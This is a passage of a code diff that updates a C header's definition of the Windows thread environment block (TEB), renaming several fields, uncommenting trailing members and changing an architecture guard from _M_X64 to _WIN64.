- PVOID ReservedForOle;
+ PVOID ReservedForOle; // tagSOleTlsData
ULONG WaitingOnLoaderLock;
PVOID SavedPriorityState;
- ULONG_PTR SoftPatchPtr1;
+ ULONG_PTR ReservedForCodeCoverage;
PVOID ThreadPoolData;
- PVOID *TlsExpansionSlots;
-#if defined(_M_X64)
+ PVOID* TlsExpansionSlots;
+#ifdef _WIN64
PVOID DeallocationBStore;
PVOID BStoreLimit;
#endif
@@ -6388,7 +6491,7 @@ typedef struct _TEB {
ULONG IsImpersonating;
PVOID NlsCache;
PVOID pShimData;
- ULONG HeapVirtualAffinity;
+ ULONG HeapData;
HANDLE CurrentTransactionHandle;
PTEB_ACTIVE_FRAME ActiveFrame;
PVOID FlsData;
@@ -6431,16 +6534,15 @@ typedef struct _TEB {
PVOID TxnScopeExitCallback;
PVOID TxnScopeContext;
ULONG LockCount;
- ULONG SpareUlong0;
+ LONG WowTebOffset;
PVOID ResourceRetValue;
- //PVOID ReservedForWdf;
- //ULONGLONG ReservedForCrt;
- //GUID EffectiveContainerId;
- //ULONGLONG LastSleepCounter;
- //ULONG SpinCallCount;
- //UCHAR Padding8[4];
- //ULONGLONG ExtendedFeatureDisableMask;
-} TEB, *PTEB;
+ PVOID ReservedForWdf;
+ ULONGLONG ReservedForCrt;
+ GUID EffectiveContainerId;
+ ULONGLONG LastSleepCounter;
+ ULONG SpinCallCount;
+ ULONGLONG ExtendedFeatureDisableMask;
+} TEB, * PTEB;
typedef struct _PROCESS_DEVICEMAP_INFORMATION {
union {